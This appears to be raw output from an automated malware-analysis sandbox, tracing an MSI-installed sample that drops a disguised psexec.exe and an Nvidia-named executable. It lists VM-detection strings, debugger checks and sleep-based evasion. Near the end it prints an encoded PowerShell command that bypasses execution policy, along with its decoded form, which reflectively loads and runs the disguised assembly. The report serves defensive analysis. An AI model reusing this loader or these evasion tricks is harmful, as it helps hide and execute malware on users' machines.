    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Nvidia-59226\Nvidia-59226.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Nvidia-59226\Nvidia-59226.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Nvidia-59226\Nvidia-59226.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Nvidia-59226\Nvidia-59226.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    barindex
    Source: C:\Nvidia-59226\Nvidia-59226.exeAPI/Special instruction interceptor: Address: C3AFDA
    Source: C:\Nvidia-59226\Nvidia-59226.exeAPI/Special instruction interceptor: Address: 12C5343
    Source: C:\Nvidia-59226\Nvidia-59226.exeAPI/Special instruction interceptor: Address: C327D4
    Source: C:\Nvidia-59226\Nvidia-59226.exeAPI/Special instruction interceptor: Address: C6CAEF
    Source: C:\Nvidia-59226\Nvidia-59226.exeAPI/Special instruction interceptor: Address: B95835
    Source: C:\Nvidia-59226\Nvidia-59226.exeAPI/Special instruction interceptor: Address: 138F860
    Source: C:\Nvidia-59226\Nvidia-59226.exeAPI/Special instruction interceptor: Address: BCBC19
    Source: C:\Nvidia-59226\Nvidia-59226.exeAPI/Special instruction interceptor: Address: 131370D
    Source: C:\Nvidia-59226\Nvidia-59226.exeAPI/Special instruction interceptor: Address: 13136D6
    Source: C:\Nvidia-59226\Nvidia-59226.exeAPI/Special instruction interceptor: Address: 13C2DA9
    Source: C:\Nvidia-59226\Nvidia-59226.exeAPI/Special instruction interceptor: Address: 1300063
    Source: C:\Nvidia-59226\Nvidia-59226.exeAPI/Special instruction interceptor: Address: 13581E7
    Source: C:\Nvidia-59226\Nvidia-59226.exeAPI/Special instruction interceptor: Address: 1345372
    Source: C:\Nvidia-59226\Nvidia-59226.exeAPI/Special instruction interceptor: Address: 12BE31F
    Source: C:\Nvidia-59226\Nvidia-59226.exeAPI/Special instruction interceptor: Address: 1397FC2
    Source: C:\Nvidia-59226\Nvidia-59226.exeAPI/Special instruction interceptor: Address: 12F0570
    Source: C:\Nvidia-59226\Nvidia-59226.exeAPI/Special instruction interceptor: Address: 12D5BEE
    Source: C:\Nvidia-59226\Nvidia-59226.exeAPI/Special instruction interceptor: Address: 12E1D79
    Source: C:\Nvidia-59226\Nvidia-59226.exeAPI/Special instruction interceptor: Address: C0F043
    Source: C:\Nvidia-59226\Nvidia-59226.exeAPI/Special instruction interceptor: Address: C78CFE
    Source: C:\Nvidia-59226\Nvidia-59226.exeAPI/Special instruction interceptor: Address: C11FE0
    Source: C:\Nvidia-59226\Nvidia-59226.exeAPI/Special instruction interceptor: Address: C599D7
    Source: C:\Nvidia-59226\Nvidia-59226.exeAPI/Special instruction interceptor: Address: BBDF97
    Source: C:\Nvidia-59226\Nvidia-59226.exeAPI/Special instruction interceptor: Address: BB046F
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeMemory allocated: 7B0000 memory reserve | memory write watchJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeMemory allocated: 1A550000 memory reserve | memory write watchJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5806Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4037Jump to behavior
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2971.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI28E4.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2A10.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Dasmei support\App Dasmei installer\dummy_app.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI29C1.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Dasmei support\App Dasmei installer\.bkpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2A6F.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI29A1.tmpJump to dropped file
    Source: C:\Windows\Installer\MSI2EE6.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-35436
    Source: C:\Windows\Installer\MSI2EE6.tmpAPI coverage: 4.1 %
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2752Thread sleep time: -5534023222112862s >= -30000sJump to behavior
    Source: C:\Windows\System32\svchost.exe TID: 5932Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\System32\svchost.exe TID: 5932Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exe TID: 7616Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exe TID: 7656Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: 4_2_00B10B80 FindFirstFileExW,4_2_00B10B80
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: Nvidia-59226.exe, 0000000F.00000003.3127988025.0000000001C51000.00000004.00000020.00020000.00000000.sdmp, Nvidia-59226.exe, 0000000F.00000003.3127866479.0000000001C51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWxX
    Source: powershell.exe, 00000006.00000002.4592389072.000001AC02808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
    Source: psexec.exe, 00000005.00000002.4583534103.000000000088A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56<(?5d
    Source: powershell.exe, 00000006.00000002.4592389072.000001AC02808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
    Source: svchost.exe, 0000000A.00000002.3667709353.00000207B2642000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.3666968222.00000207ACE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.3667778419.00000207B2655000.00000004.00000020.00020000.00000000.sdmp, Nvidia-59226.exe, 0000000F.00000003.3127822131.0000000001C80000.00000004.00000020.00020000.00000000.sdmp, Nvidia-59226.exe, 0000000F.00000003.3128394198.0000000001C81000.00000004.00000020.00020000.00000000.sdmp, Nvidia-59226.exe, 0000000F.00000003.3127548526.0000000001C79000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: powershell.exe, 00000006.00000002.4667551745.000001AC7BD30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
    Source: powershell.exe, 00000006.00000002.4592389072.000001AC02808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
    Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: 4_2_00AFA111 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00AFA111
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: 4_2_00B1097C mov eax, dword ptr fs:[00000030h]4_2_00B1097C
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: 4_2_00B09DE5 mov ecx, dword ptr fs:[00000030h]4_2_00B09DE5
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: 4_2_00AD25B0 GetProcessHeap,4_2_00AD25B0
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: 4_2_00AFA111 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00AFA111
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: 4_2_00AFE146 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00AFE146
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: 4_2_00AFA2A5 SetUnhandledExceptionFilter,4_2_00AFA2A5
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: 4_2_00AF98CD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00AF98CD
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeMemory allocated: page read and write | page guardJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAzADEAOQAzADIANgBiADYALQBjADQANgBiAC0ANAA1ADAANwAtADgANABkADIALQA5ADgAMgAzADUAOQAzAGUAMgA1AGYANAAnADsAJAB5AD0AJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACAAKAB4ADgANgApAFwARABhAHMAbQBlAGkAIABzAHUAcABwAG8AcgB0AFwAQQBwAHAAIABEAGEAcwBtAGUAaQAgACAAaQBuAHMAdABhAGwAbABlAHIAXABwAHMAZQB4AGUAYwAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACgAIgBFAHIAcgBvAHIAOgAgACIAIAArACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlACkAIAAtAEYAbwByAGUAIABSAGUAZAAgAA0ACgB9AA==
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeProcess created: Base64 decoded $x='319326b6-c46b-4507-84d2-9823593e25f4';$y='C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exe';try { if ([Environment]::Version.Major -ge 4) { $null = [Reflection.Assembly]::UnsafeLoadFrom($y) } else { $null = [Reflection.Assembly]::LoadFile($y)} . ([_32._88]::_74($x)) exit $LASTEXITCODE} catch [NotSupportedException]{ Write-Host 'Application location is untrusted. Copy file to a local drive, and try again.' -ForegroundColor Red}catch { Write-Host ("Error: " + $_.Exception.Message) -Fore Red }
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeProcess created: Base64 decoded $x='319326b6-c46b-4507-84d2-9823593e25f4';$y='C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exe';try { if ([Environment]::Version.Major -ge 4) { $null = [Reflection.Assembly]::UnsafeLoadFrom($y) } else { $null = [Reflection.Assembly]::LoadFile($y)} . ([_32._88]::_74($x)) exit $LASTEXITCODE} catch [NotSupportedException]{ Write-Host 'Application location is untrusted. Copy file to a local drive, and try again.' -ForegroundColor Red}catch { Write-Host ("Error: " + $_.Exception.Message) -Fore Red }Jump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: 4_2_00AD7800 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetProcessId,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,Sleep,EnumWindows,SetWindowPos,WaitForSingleObject,GetExitCodeProcess,GetWindowThreadProcessId,GetWindowLongW,4_2_00AD7800
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI2EE6.tmp "C:\Windows\Installer\MSI2EE6.tmp" /HideWindow "C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exe" "C:\Program Files (x86)\Dasmei support\App Dasmei installer\1e.ps1"Jump to behavior
